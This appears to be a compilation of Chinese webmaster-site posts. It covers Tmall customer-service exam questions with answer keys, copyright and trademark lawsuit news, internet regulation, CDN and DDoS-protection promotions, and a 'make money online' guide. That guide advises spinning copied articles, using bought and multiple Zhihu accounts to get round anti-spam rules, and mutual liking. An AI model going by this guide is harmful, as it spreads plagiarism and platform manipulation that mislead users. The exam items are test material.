小张是一家天猫店铺的售前客服,店铺为了方便消费者开通了货到付款业务,某天一位消费者咨询小张,自己不会使用网银,店铺是否可以使用货到付款的功能,此时的小张应该如何回复消费者? A告知消费者可以使用货到付款业务,并且通过旺旺告知消费者货到付款的下单流程。 B告知消费者可以使用货到付款业务,但是必须购买300元以上的产品才可以使用 C告知消费者不可以使用货到付款业务,因为货到付款的费用很高。 D告知消费者店铺只支持支付宝付款交易,其他付款交易不支持。 正确答案:备注: 货到付款-开通货到付款业务的商家不允许拒绝消费者货到付款的要求 A   #### 小张是一家天猫店铺的客服,有一位消费者拍下了店铺的一个暖水壶 淘宝售前咨询规范考试: 小张是一家天猫店铺的客服,有一位消费者拍下了店铺的一个暖水壶,该商品属于全国EMS包邮产品 ,咨询小张,自己是新疆的消费者,是否可以发申通快递,小张应该如何回复消费者? A告知消费者,产品虽然是包邮的,但是只包邮EMS,其他快递需要补缴差价。 B告知消费者,新疆属于偏远地区,无法发货,即使发EMS也需要补缴邮费 C告知消费者,申通快递无法发货到新疆,让消费者申请退款 D告知消费者,店铺只支持EMS快递,与申通快递不合作,引导消费者退款 正确答案:  A 备注: 发货-包邮问题     #### 小心啦!2025年了织梦公司还在到处告侵权 最近,主机吧登陆爱企查后台时,无意中看到三年前关注的织梦CMS相关公司上海卓卓网络科技有限公司,发现居然有大量动态。 这一看,一年就高达上百条,主机帮特地点击查看了几页,发现全是侵害软件著作权纠纷的案件。 自从2021年织梦开始维权以来,几乎每个月都有开庭公告,而被告的基本都是一些各行各业的企业。 这不难理解,原因是以前dedecms被大量用于企业网站建设,由于其简单,而且号称开源免费,深受很多网站建设公司喜爱,那些网络公司基本都是采用织梦CMS做后台建站,再通过设计前端模板就可以做出一个不错的企业网站。 不过,织梦CMS一直是有商业授权需求的,以前网站行情好的时候,织梦公司并不会维权,现在行情差了,就开始大量维权了,织梦公司不仅把网站公司给告了,还把负责建站的网络公司给告了。 总之,有用织梦系统没有授权的,赶紧换了吧,以免被告。 #### 小心啦!别用电视剧截图服装作宣传,可能被判侵权! 1 月 30 日消息,据上海知产法院微信公众号消息,近日,上海知产法院对一起侵犯信息网络传播权案件作出二审判决,认为淘宝天猫某店铺在销售《亲爱的,热爱的》“韩商言同款”上衣的同时,未经许可使用该电视剧截图画面侵犯著作权。 上海知产法院经审理认为,涉案电视剧《亲爱的,热爱的》属于《著作权法》规定的电影作品,而电影作品是由一系列有伴音或者无伴音的画面组成的,上诉人尽管在其天猫店铺中使用了电影作品的一张截图,但该截图属于从电影作品的连续画面中分离出的一部分,故属于电影作品的组成部分。由于被上诉人是涉案电影作品的著作权人,故其对电影作品中的单张截图亦享有著作权。 上海知产法院判决驳回上诉,维持隆科公司赔偿剧酷公司经济损失及合理费用 35000 元的原判。 也就是电视剧里的每个画面都是享有著作权的,哪怕你截图都不行,也属于侵权,这就非常严格了,各位站长涉及到影视作品的东西千万别碰了,这玩意乱得很。 #### 小心啦!微信打击流量造假! 12月24日 消息:今日,微信表示,为落实国家网信办关于“清朗·打击流量造假、黑公关、网络水军”专项行动的部署和要求,微信平台从即日起将开展为期 2 个月的“清朗·打击流量造假、黑公关、网络水军”专项行动。 将针对以下三方面内容进行重点治理: 1.从严治理流量造假问题,将聚焦视频直播场景,严格管控帐号使用刷量外挂、恶意引流的行为,重点整治组织水军帐号进行刷量增粉、炒作热度等问题。 2.持续整治网络黑公关乱象,将重点打击以发布负面信息为由进行敲诈勒索、蹭炒社会热点进行恶意营销、发布编造的虚假和误导性信息等行为。 3.进一步清理涉网络水军信息、帐号。将重点清理推广引流或招募水军的信息,并加大力度打击批量注册、发布同质信息以博取流量关注的网络水军帐号。 微信表示,微信平台一直以来致力于为用户提供绿色、健康的网络生态环境,后续将严格落实主体责任,及时处理相关违规内容及帐号。 #### 小心啦!网信办集中整治违法信息外链问题 去年,主机吧中过招,因为网站存在非法外链,被要求写整改书,今年又来了,大家赶紧检查下,自己网页有没有留存的非法外链,有的话赶紧删了。 近日,中央网信办专门印发通知,在全国范围内部署开展为期2个月的清朗打击违法信息外链”专项行动。本次专项行动聚焦违法信息外链问题易发多发的8个重点环节开展整治。 中央网信办有关负责人强调,违法信息外链问题变体变异快、跨平台流窜性强,极易反弹反复,各地网信部门要高度重视、周密部署,切实抓好落实,全面掌握违法信息外链表现形式,集中查处一批问题突出的账号、群组和平台,涉及违法犯罪的,移交有关部门处置,并对外公开曝光,形成震慑效应。要通过开展专项行动,建立覆盖各类重点网站平台的跨平台工作机制,及时共享违法外链最新问题表现,扩大联动处置效应,全力铲除违法信息外链滋生土壤。 一是账号环节。在账号头像、昵称、简介、签名、封面等位置,发布含有非法网址链接等内容。通过发布大尺度低俗内容、重复低质发文、高频点赞关注、账号简介推送等方式,在违法违规账号间互相跳转引流。 二是评论环节。在热门话题评论区、楼中楼”、弹幕等环节,发布带有非法网址的信息。以千万别搜”不要看我下面的文字”等为噱头,诱导用户搜索非法网站。 三是群圈环节。发布含有色情、诈骗等网址链接的聊天记录、H5页面、文档笔记、小程序分享链接,利用虚假拼团、红包、游戏测试等活动,使用不转不是中国人”等夸张语言,诱导用户点击传播违法外链。 四是直播、短视频环节。使用AI技术或者编造虚假身份背景,发布伪成功学、伪国学、养生课程”、理财技巧等信息,诱导网民添加好友、加入群组进而实施诈骗。直播过程中通过举牌、快速切换手机屏幕、展示打码照片等发布暗示性内容引流,或者在直播公屏公告、节目单、贴纸等嵌入非法网址。 五是生活服务环节。商家店铺以高端养生”个人工作室”为名,发布带有暧昧氛围的图片,诱导用户添加好友,为线下非法活动引流。在交友婚恋平台注册账号发布大尺度照片,吸引异性添加好友,进行涉黄涉赌等非法活动。在电子地图地点中嵌入赌博、色情等网址变体,在同城频道、搜索周边等版块发布私人按摩”可上门”等暗示性信息并标注地点,进行非法引流。 六是浏览器、搜索引擎环节。在浏览器弹窗广告等位置推送低俗漫画、小说等内容,诱导用户点击展开全文”继续收听”等按钮,跳转至外部非法网站。通过人工或技术手段,将含有非法网址的搜索结果前置,或者生成为联想词、相关搜索,诱导网民点击访问。 七是电商环节。以情感单机游戏”等为名售卖色情游戏,通过客服咨询引流至第三方平台兜售色情小说。以提供视频直播推广”粉丝入驻观看”等服务的名义,诱导买家私聊询问,实则提供刷量控评增粉等网络水军服务。 八是涉未成年人版块环节。在未成年人集中的频道版块商业推广位上,展示色情小说、低俗网文等引流。在未成年人使用较多的功能应用中发布色情引流链接,以免费漫画、视频资源等名义诱导访问非法网站或者通过网盘、云盘获取色情资源。 #### 小心啦!网站买卖微信号被判侵权! 10月21日 消息:据南京市中级人民法院消息,某网络科技公司是某网站的经营者。该网站设有微信账号买卖、微信辅助注册、微信辅助解封等交易专区。交易专区里包含大量微信买卖信息。 腾讯公司认为,某网络科技公司的行为严重影响了微信平台的正常运营,破坏微信平台的健康生态。故诉请法院判令被告某网络科技公司立即停止不正当竞争行为,在其官方网站首页显著位置发布消除影响的公开声明,同时赔偿经济损失及合理支出210万元。 经审理,法院认为,被告某网络科技公司所实施的行为,违反了诚实信用原则及行业内公认的商业道德,扰乱了互联网行业市场竞争秩序。《微信账号个人使用规范》《腾讯微信软件许可及服务协议》中明确规定,微信账号的所有权归腾讯公司所有,初始申请注册人仅获得使用权,使用权也仅属于初始申请注册人,其不得赠与、借用、租用、转让或售卖微信账号或者以其他方式许可非初始申请注册人使用微信账号。被告所实施的行为,违反了该项规范,对互联网行业平台经营者通过合法经营和规范管理获得竞争优势的行业生态环境产生负面影响。 同时,被告所实施的行为,损害了腾讯公司和微信用户的合法权益。该行为破坏了腾讯公司对其运营的“微信”产品的管理规则,会对原告的商业信誉产生不利影响,增加腾讯公司的管理成本和微信用户的使用风险,危害信息安全。因此,被告某网络科技公司所实施的行为对腾讯公司构成不正当竞争。 最终,法院判决,被告某网络科技公司赔偿腾讯公司经济损失100万元及维权支出的合理费用9万元;在其网站首页刊登声明以消除影响。 #### 小心啦,近期有大量网站挨刷流量导致CDN欠费 前几天主机吧曾说过腾讯云CDN用户被大量刷流量事件,怀疑是竞争对手恶意刷流量,现在看来不是。 因为被刷的网站都是各行各业的,而且竞争也不是很激烈,没必要冒着被抓的风险干这事。 而国内大型科技网站快科技也遭到了恶意刷流量事件 有站长认为是PCDN相关的产业有关,这些恶意请求是故意拉取和消耗某些网站托管的CDN文件,来平衡自己的上传和下载。 为什么这么做呢?原因是跟国内运营商打击PCDN的策略有关。 早在今年1月份,就有不少联通宽带用户反馈遇到了上传被限速的情况。核心原因在于,部分运营商为了打击PCDN,通过监测上下行流量来判断用户是否可能使用PCDN。 如果用户存在巨量上传,但下载量非常小,那有极大可能会被判定为PCDN,并因此遭到限速或封禁。 所以,很有可能的情况是,那些PCDN从业者,为了躲过运营商的封堵,就会伪造数据不停地发起请求并下载,以此产生大量的下载流量,以此来平衡上传的流量,让下载和上传“看起来”相对平衡,避免被运营商判定为PCDN。当然,上述情况只是猜测,并未得到确凿证据。 但不管怎么样,站长同学们近期如果发现网站出现大量请求,要及时处理,否则这些恶意请求可能会对网站使用的CDN服务产生流量损失,如果使用阿里云腾讯云的CDN的,要设置好欠费提醒,同时主机吧建议使用套餐型无后付费的,比如百度云防护CDN,专业版月流量就有3T,用完就回源,不用担心被欠费问题,同时百度云防护还支持WAF功能,可以直接在CDN上限制PCDN的请求,如果请求过于频繁还会触发CC防御进行拦截,推荐大家使用。 #### 小心字魂创意字体侵权! 最近,有位客户反馈,其几年前公众号上的一篇文章被告侵权了,原因是使用了字魂创意字体! 主机帮查了下,这个字魂创意字体的所属公司是一家上海名为上海字魂网络科技有限公司的专注字体的,其旗下字魂字体均是需要商用授权的。 不过,他们的字体是在官网上可以免费下载到的,但这并不意味着你可以免费使用,一旦用于商业,将面临侵权风险,这些字体公司的收入平时除了卖商业授权赚钱外,很大一部分收入来源于告侵权赚取赔偿费。 主机帮特地去查了下该公司,发现司法信息高达726,这说明了这家公司是长期诉讼的。 如果你觉得他们公司的字体好看,非用不可,建议一定要购买商用授权,否则极有可能面临被告风险,也想着互联网这么大,就算用了他们也不知道,这个概率很低,这些公司都有专门的法务部,专门找侵权的公司告的。 如果你不想花钱买字体授权,那么可以用别的开源免费的字体,百度上搜免费商用字体,一大堆。 #### 小心接入chatgpt,可能会被罚款 今年以来chatgpt大火,但是国内是禁止用chatgpt的,原因是chatgpt会收集国内用户数据,而且不受国内控制,很容易给一些非常敏感答案,所以国内一直都是禁止访问chatgpt官网的。 不过即使禁止了,国内某些人也有办法访问,甚至有人把chatgpt打包做成APP,这是非常危险的。 这不,国内有公司已经被罚了。 国内已经有法律法规规定,个人数据不能得随意给国外的,而使用chatgpt肯定会把个人数据传送到国外了,把chatgpt打包并宣传给国人使用,更是构成了为境外机构收集个人信息罪,惩罚肯定是非常严的,所以大家小心啦,别卖chatgpt服务啦。 #### 小心春节网站有被攻击的风险 春节是我国最重视的节日,每年这个时候一般的站长都会给自己放长假,因此春节期间往往网站是处在没有管理的状态的,而很多黑客都是盯着这个时候进行攻击的。这不,论坛上的一位站长就在除夕当天被DDOS/CC攻击了。 那么要如何预防DDOS/CC攻击呢? 主机吧推荐使用高防CDN来进行安全防御,推荐百度云加速和京东云星盾。 百度云加速 百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。 优惠链接https://zhujib.com/yunjiasu.html 京东云星盾SCDN 京东云星盾SCDN安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 优惠链接:https://zhujib.com/jdxingdun.html #### 小心被封:域名别跳转到百度、淘宝、腾讯! 近两年来,国内域名商在反诈骗这块可谓是宁杀错不放过。很多站长都中招了,域名放到阿里云那,无缘无故被封。今天就有一个站长因为把域名跳转到百度上,导致被封了。 理由是涉诈行为,不仅是跳转百度,跳转到淘宝、腾讯这些大的网站都会涉及到诈骗行为,所以各类站长千万别把域名跳转到那些大型网站上去哈,以免造成不必要的损失。 #### 小心!Discord用户数据泄露,客服“外包”公司被黑是根源 Discord最近“出事了”。该平台在10月3日承认,由于他们雇佣的一家第三方客服公司被黑客攻破,导致一部分用户的个人信息被盗,黑客甚至还用这些数据来勒索Discord。 哪些人受影响?如果你曾经联系过Discord的客服或举报过问题,那么你的信息可能就在这次泄露的范围内。 哪些信息最危险?泄露的信息非常详细,包括你和客服的聊天记录、你的姓名、邮箱、IP地址,甚至还有消费记录和信用卡号后四位。最严重的是,有极少数用户用来证明自己年龄的身份证照片也被盗了。 Discord如何应对?平台表示已经第一时间“拉黑”了那家出事的客服公司,不再让它访问系统。同时初步判断,这次是“家贼难防”,黑客本身并不能直接攻破Discord的主服务器。 #### 小心!网站名字也可能侵犯商标! 近两年国内中小企业非常艰难,很多人收入大减,于是就有很多人开始走偏门了,而商标侵权就是当下非常流行的碰瓷手段。对方先是把某个名称申请成商标,然后在互联网广收集那些跟注册商标有关的企业,收集相关资料。然后再通过律师涵通知你侵权了,要求赔偿经济损失,一些企业不懂的,都会中招。 而主机吧今天要说的是,有位站长就是因为网站名称触犯了人家商标,被告了,要求赔偿50万! 收到来自深圳法院的一条短信,内容说是北京某个公司起诉我商标侵权,之后我听取律师朋友的建议,先打电话查询是不是有这个事情,查询确认之后是存在的,一番调查之后,我清楚了事情的由来。是我的一个网站名称被起诉商标侵权了,我的网站名称是【ABC】,个体户BA,对方的商标是【AB】,我们的网站可能算是同一个行业的,但内容不同,法律是怎样界定的还需要再了解。对方主张赔偿50万,起诉材料上说我网站给他们造成巨大损失,但我网站纯粹就是公益的,从上线到现在没有获利一分钱。认真看了对方的起诉材料后,对方指控我网站提供培训资源下载,我一脸的莫名其妙,继续看材料才知道原来是对方把一个外链的网站内容也加进去了,那个网站不是我的,我也不认识站长,是一个资源搜索引擎,是去年我在知乎看到有人推荐,我访问后觉得那个网站挺好用的,能帮助到网站的用户,就添加了一个外链,而且那个外链的网站和对方的商标和经营范围没有一丁点的关系,对方还能以这个外部的网站控告我网站提供培训资源下载,非常不理解。而且那个外链我去年加了一段时间后过不久就删除了,看材料对方起诉我的时间,那个时间外链早就不存在了,也就是说对方从去年就一直盯着我网站取证。再补充一点的就是我网站是个没写完的半成品,很多链接和模块都是空的,不是一个盈利项目,从来没有获利,没有直接获利,也没有间接获利,也没有引流到公众号啥的,就只是一个查询网站,网站内容也是公开透明无版权的,求助大佬们,这件事应该怎么处理?以下是来自站长的自述 站长的经历值得大家警惕,千万不要把网站起一个已经有相关注册的名字,要起一个独一无二的,哪怕到时对方把你网站名字注册商标了,你比他们用得早,这在商标法里是有免责的,而且对方既然为了碰瓷商标法,肯定不会特地注册一个只有一两家企业在用的商标的。 #### 小李在一家天猫专营店购买了一件大衣,使用了信用卡付款 售前咨询规范考试问题:小李在一家天猫专营店购买了一件大衣,使用了信用卡付款,但是商家后续联系小李需要小李补缴信用卡手续费,小李拒绝补缴并且投诉商家违背承诺,是否成立? A成立  B不成立 正确答案:A 备注: 参考知识:信用卡支付功能   #### 小狐TV站长传播侵权作品八千余部 获刑三年 10 月 28 日消息,据扫黄打非办官方微信消息,近期,广东省广州市“扫黄打非”部门办结一起全国“扫黄打非”办公室和公安部门治安管理局联合挂牌督办的“小狐TV”侵犯著作权案,被告人阳某被南沙区人民法院判处有期徒刑三年,并处罚金人一万元,并被没收违法所得134102. 05 元。 2018 年 9 月,广州市“扫黄打非”办公室根据上级转办线索,发现“小狐TV”网站可以观看大量境内外电视剧和综艺节目。广州市“扫黄打非”办协调文化执法、公安等部门展开技术侦查,锁定证据。 经查, 2018 年 1 月开始,阳某使用在广州市南沙区设立的广州韦某公司作为ICP备案登记人,创建并经营“小狐TV”网站,在未经著作权人许可的情况下,通过链接其他网站播放源的方式传播北京爱奇艺科技有限公司、深圳市腾讯计算机系统有限公司及其他公司的电影、电视、动漫、综艺作品 8377 部。 #### 小白低成本入门互联网赚钱的几个点 前面我们讲了小白招聘写手去做网站seo,花的这个钱也是弥补了自己执行力不足的问题,退一步讲,就算没赚到钱,卖掉也可以,所以赔本的可能性还是很小的。其实我们仔细想一想,互联网就是个大的资源库流量池,每天有好几亿的人去访问这个资源库。 而这个资源库需要新鲜的血液(原创),那我们在这个资源库留下的痕迹越多,被别人看到的可能性也就越大。 而写手做的伪原创就是为了在百度留下痕迹。 除了做网站seo,还有很多种玩法,思路都相通,我们要学会变通,灵活运用。 比如做淘宝 我经常在豆瓣看到 招聘小红书代发,微淘写手的。 其实也是这个道理,微淘,小红书都是流量池,招聘来写手,在流量池留下痕迹,总会有人看到。 而这些文章你给写手做个培训即可,不要小看写手,我招聘的几个我感觉都超值,伪原创的能力至少比我强的多。 再比如通过软文卖产品。 这个案例以前见到过,今天找了好久没找到,大概说一下。 以前经常在今日头条见到像这样的文章:一个月减肥30斤,打开文章后,文章会推荐你一个产品比如XXX,文章会让你到百度搜,你搜索后,排名第一的就是人家卖的产品。 所以你做一个网站,取名xxx,然后让写手大量在其他地方发文章,别人看到在百度搜xxx,因为名字是唯一的,那可不找到的就是你嘛。 再比如知乎 我自己也写了两个月知乎了,深知其中的原理,以前的时候很多做的好的,把知乎做到极致的都是在做知乎矩阵。 也就是多账号发文章,然后文章都提到同一个公众号。 这样的方法现在已经不行了,会被认为是作弊,一个知乎账号只允许留一个公众号,因此也有很多几万粉丝的大v被封号。 但是其实我们换个思路同样可以操作,那就是做个网站,既然每个账号只允许留一个公众号,那我多账号都留一个网站,或者在文章中提到这个网站留下网址,那么所有流量就都导向一个地方了。 再或者比如我自己建立一个豆瓣小组,或者我申请一个兴趣部落。 我们知道在知乎留微信留qq等会被认为是垃圾广告,而如果我们在文章中都植入这个小组,就不会被认为是广告了。 所有流量导向这个小组。再然后小组设置关注公众号后才可以加入,这样最终流量还是导入公众号。 做好这些,我们剩下要做的工作就是招聘写手去写干货软文,可以自己购买知乎账号,也可以让写手代发到自己的知乎,知乎并变不了现,所以没必要在意粉丝多少,而且还可以让写手之间互相点赞,提高曝光。 至于如何写干货软文,这就是你要做的事情了,你可以在豆瓣/天涯等挑一些高质量的文章让写手去伪原创。 稍微长点的文章可以给加点钱,这就是我们的投入,当引流到公众号,公众号做好变现,整个过程让你的资金流动起来,而且在知乎你的文章遍地开花,积累越来越多,后期流量也会越来越多,这才是健康的项目,长久的生意。 讲完了方法我们在列举几个可以做的项目,当然了你也可以和你现在正在做的结合起来。 第一种:卖产品 比如做开淘宝店或者通过网站卖产品,需要注意的是产品一定要利润高一点,不然都不够写手的稿费。 新广告法出来后很多暴利产品c店是卖不了了,但是我发现很多产品还是在百度卖,比如灰指甲、补气血、缩阴等,另外我还见到很多违规的暴利产品在卖,这里就省略了。。。 如果不想开店,也可以搭建淘宝客网站,做淘宝客。再或者比如前面我们提到的搭建一个新奇特产品的网站。 第二种:手赚网(羊毛类网站也可以) 前面我们提到搭建任务网,手赚网也属于任务网的一种,这个源码在淘宝就可以找到。 搭建好之后,我们只要招聘写手去写赚钱类的文章,优化 网络兼职、网上赚钱这些词,有了排名,我们就有钱赚,另外我们还可以在知乎、博客、豆瓣等去发文章,都指向我们的网站。 需要注意的是网站搭建好了之后,我们要注册百度站长平台,当写手写了文章,我们首先把文章发表网站,然后把链接提交给百度,让百度知道文章的原创是你的网站。而不至于文章发其他平台后被收录了,百度还认为你的文章是抄的。 然后再把文章发其他平台,发知乎可以给你带来流量,发新浪博客、豆瓣日记不仅可以给你带来流量,还发了外链。 上篇文章发表了之后,有个读者留言说,文章不仅要原创,还得是用户需要的,搜索引擎才能喜欢。 借这里做个说明,我们做网站不是做公众号,即使你写的内容再干,用户也不一定喜欢。 而有些信息用户是需要的,比如我们做的手赚网,我们的文章写的再好用户也不一定需要,而网站的这些任务才是他们需要的。所以不需要的这部分我们让写手去写,有了排名,用户也会喜欢。 再比如这个国外网站大全的站。 文章页是用户需要的内容,但对百度蜘蛛来说,却不是高质量的内容(字数都不到100字)。 所以这个站长除了发布各个国外网站,还有其他板块用来发表一些蜘蛛喜欢的长文章。 所以招聘写手伪原创的做法我觉得是可行的。 第三种:做功能型的网站 这种就比较高级一点了。(这样的网站很多,很小众却很赚钱) 比如一些网站可以免费下载百度文库的内容,你要下载需要充值2元钱,我想大部分人应该都会充值,除了这种变现方式,还链接了影视站,影视站的cpc广告也可以变现,还链接了优惠券的网站。 难就难在你需要投资去开发一个这样的网站。 好处是:比如你在知乎回答了类似“哪些软件很小众却很实用的问题”,一些答主就会抄袭你的文章,有用的东西扩散很快。 比如我的文章就经常被一些人抄,一个读者告诉我,有个人抄我的文章发小红书都积累了一万多粉丝了。 比如我写了fiverr之后,大家都开始写,fiverr肯定莫名其妙最近这么多人访问。 比如八图片网,一个人写过他可以靠打赏赚钱,后面就很多人写。 比如大家都写91IPO,那91ipo.cn就真的火了。 很多的原创并不是真正的原创,我们只不过是搭建一个平台,让别人去写,让别人去提供内容! 除了这些还有很多站可以做,但是这些项目其实都有一个共同点那就是可以马上变现。 一些像小说站、电影站、读书网、门户站等流量站,变现周期长的,你做的过程中看不到钱,就会失去信心,当然你能引流到公众号也可以。 作者:酷酷说钱 #### 小白文,CDN绑定操作原理是什么? 发现很多站长没有碰过CDN,不懂的CDN是什么原理,如何操作。 今天主机吧就来大概说下CDN的操作原理。 1.域名绑定CDN 一般情况下购买CDN套餐后,我们需要把自己的域名绑定到CDN上,CDN控制台上会有添加域名的,也有些是购买的时候已经要先绑定了,比如百度云加速。 2.验证域名所有权 一般CDN服务商为了安全,都是会要求绑定的域名解析验证所有权,比如TXT解析某记录,如果你解析通过了就可以删了。 3.CDN添加子域名 想要CDN加速你的域名,就需要在CDN配置里填写哪个子域名,以及这个子域名指向的服务器IP,有了这个配置,CDN才知道需要请求哪个服务器IP。 4.域名解析CDN生成的cname记录 CDN里添加好子域名配置后,CDN会提供一个网址,比如zhujib.com.lk-b027b6.cloud-scdn.com这样的,我们到域名解析处进行cname解析这个记录,这样我们的域名访问才会真正经过CDN的节点,很多同学只在CDN设置了子域名,并没有真正解析到CDN上,导致域名并没有真正经过CDN,这是错误的。 CDN操作原理其它很简单:CDN指向服务器IP——域名指向CDN生成的cname 用户访问CDN的流程:用户访问域名——域名解析访问CDN的节点——CDN节点请求回网站服务器IP——服务器内容返回CDN节点——CDN节点返回内容给用户 这么一说是不是原理很清晰了呢? #### 小白是一家天猫广场舞服装店铺的售前客服,某日消费者向小白咨询 淘宝售前咨询规范考试题: 问题:小白是一家天猫广场舞服装店铺的售前客服,某日消费者向小白咨询,想购买100套广场舞服装用于参加小区的广场舞比赛,但是由于自己上了岁数,不会使用网银,是否可以使用汇款的方式购买,小白应该如何做? A拒绝消费者的付款方式,因为线上交易仅支持支付宝交易付款 B拒绝消费者的付款方式,但是可以通过在线引导的方式教授消费者网银的操作或者找人代付 C告知消费者店铺的汇款账号,让给消费者汇款购买,毕竟上了岁数的消费者使用网银不方便 D告知消费者可以使用货到付款进行付款。 正确答案: AB。 备注: 线上交易仅支持支付宝交易,题目中未提到店铺开通了货到付款业务   #### 小白是一家天猫店铺的售前客服,在与消费者沟通过程中发生了不愉快 淘宝售前咨询规范考试:小白是一家天猫店铺的售前客服,在与消费者沟通过程中发生了不愉快,心生怨恨将消费者拍下未付款的订单全部关闭了,小白这种做法合适么? A可以关闭,因为已经与消费者发生了不愉快即使交易,也会很多麻烦 B不可以关闭,因为天猫规则规定了不允许商家关闭消费者未付款订单 C可以关闭,因为占用在线有效库存 D不可以关闭,因为关闭订单后非常容易造成很多后续的问题,应该与消费者沟通消除误会,按照消费者的意愿是否关闭订单。 正确答案: D  备注: 关闭订单-由于沟通造成的关闭订单会导致后续较多的售后问题以及滋生恶意行为 #### 小白是一家天猫食品专营店的客服,某日有位消费者向小白咨询,自己收到了一箱零食 淘宝售前咨询规范考试题: 小白是一家天猫食品专营店的客服,某日有位消费者向小白咨询,自己收到了一箱零食,箱子上是小白家店铺的网址,想通过自己的手机号查询一下是谁帮自己购买了零食,此时的小白面对消费者这种请求,应该如何处理?   A告知消费者购买人的旺旺ID,因为有可能是朋友送的礼物,与人方便自己方便。 B拒绝告知消费者购买人的旺旺ID,因为这个属于泄露消费者信息 C告知消费者购买人当时的聊天记录截图,让消费者自己判断是谁送的礼物 D拒绝告知消费者的旺旺ID而是告知消费者购买人的注册地址让消费者猜测购买人的信息 正确答案:B 备注: 泄露信息-泄露购买者旺旺信息 #### 小皮面板:phpStudy团队开发的免费服务器管理面板 小皮面板(XiaoPi Panel/XPanel)是由phpStudy团队开发的免费服务器管理面板,专注于简化Linux服务器的环境搭建与运维管理。以下是其核心特点: 核心功能 一键环境部署:支持LAMP/LNMP等常见环境,集成Apache/Nginx、MySQL、PHP等多版本软件,可自由切换PHP版本。 可视化操作:提供网站管理(域名绑定、SSL证书配置)、FTP账户管理、数据库(MySQL/MariaDB)操作、计划任务等图形化界面。 安全防护:内置防火墙规则配置、IP黑白名单、登录验证码,支持HTTPS加密及异常行为监控。 适用场景 新手友好:界面简洁,适合无运维经验的用户快速搭建Web环境(如WordPress、Discuz等)。 多系统支持:提供Windows、Linux、Mac版本,Linux版基于Docker容器技术实现环境隔离。 优势与更新 永久免费:承诺不设付费功能,区别于部分竞品的增值服务模式2。 2024年重构升级:新版优化了应用商店(一键安装开源软件)、反向代理配置及安全加固方案,提升运维效率2。 对比宝塔面板:小皮功能更轻量,适合基础需求;宝塔功能全面但部分高级功能需付费。若需低成本、易上手的服务器管理工具,小皮是理想选择。 #### 小皮面板:类似于宝塔的免费国产服务器管理面板 这几年宝塔面板在建站市场占有率非常高,不过很多人不喜欢用宝塔面板,那么可以考虑下另一个国产面板:小皮面板。小皮面板其实开发很久了,其前身是phpStudy开发的,主机帮三年前有推荐过,最近因为小皮面板改版了,页面跟宝塔相近,所以才重新推荐一遍。 跟宝塔一样,小皮面板是免费的。 相比宝塔,目前小皮面板的商业化要少些,软件商店也很少,不过如果只是简单的搭建网站环境的话绝对够的。 有需要的同学可以了解下:https://www.xp.cn/ #### 小程序也要备案啦 8 月 9 日消息,近日,工业和信息化部印发了《工业和信息化部关于开展移动互联网应用程序备案工作的通知》。 微信官方今日宣布:为贯彻落实《中华人民共和国反电信网络诈骗法》、《互联网信息服务管理办法》及《非经营性互联网信息服务备案管理办法》等法律法规要求,配合相关部门做好移动互联网信息服务管理,根据 2023 年 8 月 4 日工信部发布的《工业和信息化部关于开展移动互联网应用程序备案工作的通知》,微信公众平台 ICP 代备案管理系统将提供新增备案、变更备案、注销备案等服务,协助开发者完成微信小程序备案。 据介绍,备案系统将于 9 月 1 日上线,若在备案过程遇到任何问题,可通过备案系统里的客服入口进行咨询。IT之家附微信小程序备案相关事项通知:  一 备案必要性 在中华人民共和国境内从事互联网信息服务的移动互联网应用程序主办者,应当依照《中华人民共和国反电信网络诈骗法》《互联网信息服务管理办法》(国务院令第 292 号)等规定履行备案手续,未履行备案手续的,不得从事互联网信息服务。 开发者需依法履行备案手续,未按要求履行备案手续的,微信小程序不得开展业务,平台不提供上架服务。(具体安排请参照“备案期限要求”)  二 备案期限要求 1、若微信小程序未上架,自 2023 年 9 月 1 日起,微信小程序须完成备案后才可上架; 2、若微信小程序已上架,请于 2024 年 3 月 31 日前完成备案,逾期未完成备案,平台将按照备案相关规定于 2024 年 4 月 1 日起进行清退处理。 #### 小程序使用京东云星盾防御住DDOS/CC攻击 最近,主机帮有收到一位电话联系的客户反馈,其小程序遭到了DDOS/CC攻击,咨询主机帮使用哪种产品防御比较好,主机帮根据客户表述,建议使用京东云星盾商业版。 星盾SMB商业版防护域名数量:1个主域名,子域名20 域名接入方式:CNAME DDoS防护峰值:平台TB级共享防御 应用攻击防御:支持 CC攻击标准防护:自动防护 WAF自定义规则:20条 最大可缓存文件:500MB 自定义页面规则:20条 免费通用证书:支持 自定义上传证书:2 专用证书:1 正常业务带宽峰值:100MB 套餐总流量:5TB(可购买流量包1980元/10TB)年付:1520元 该套餐对DDOS和CC攻击防御都有不错的效果,价格还便宜。 京东云星盾 安全加速 SCDN 高防CDN 隐藏IP ddos防御 CC攻击防御[出售] ¥720 ¥900 库存:9.9k 已售:103 人气:4.2 经过一番考虑后,客户购买并部署了京东云星盾,当天就遭到了大量CC攻击,但都被拦截了。 当天8点就遭遇了峰值高达393万次的CC攻击,攻击量贼大,均已被京东云星盾识别并拦截,客户网站稳稳运行中。 此后,客户网址也遭遇了一些小的CC攻击,但已经没有这次大了,那么人会疑问了,为什么这个黑客没有DDOS攻击呢?这是因为黑客肯定是DDOS攻击过了,而高防CDN由于是共享的是不显示DDOS攻击流量的,而且使用京东云星盾后,源服务器IP是隐藏起来的,黑客想要攻击你,得就直接攻击京东云星盾的IP,而京东云星盾的IP是有DDOS清洗能力的,所以并不受影响。 #### 小程序如何防御DDOS攻击? 近几年来,国内比较流行小程序,而由于小程序较多,黑客也盯上了小程序,小程序ddos攻击就多了起来。主机吧这边经常有收到站长们的反馈,自己家的小程序被攻击了,想要咨询如何防御小程序DDOS攻击? 小程序防御其实跟网站防御差不多,三个方案: 1.使用高防服务器 价格较高,而且需要更换服务器。如果被CC攻击需要高防服务器可以自义防火墙,否则无法防御CC攻击。 2.高防IP 比较灵活,一般高防IP都支持CC防御规则自定义,可有效防御各种CC攻击。唯一缺点就是价格比高防服务器要贵。 3.高防CDN 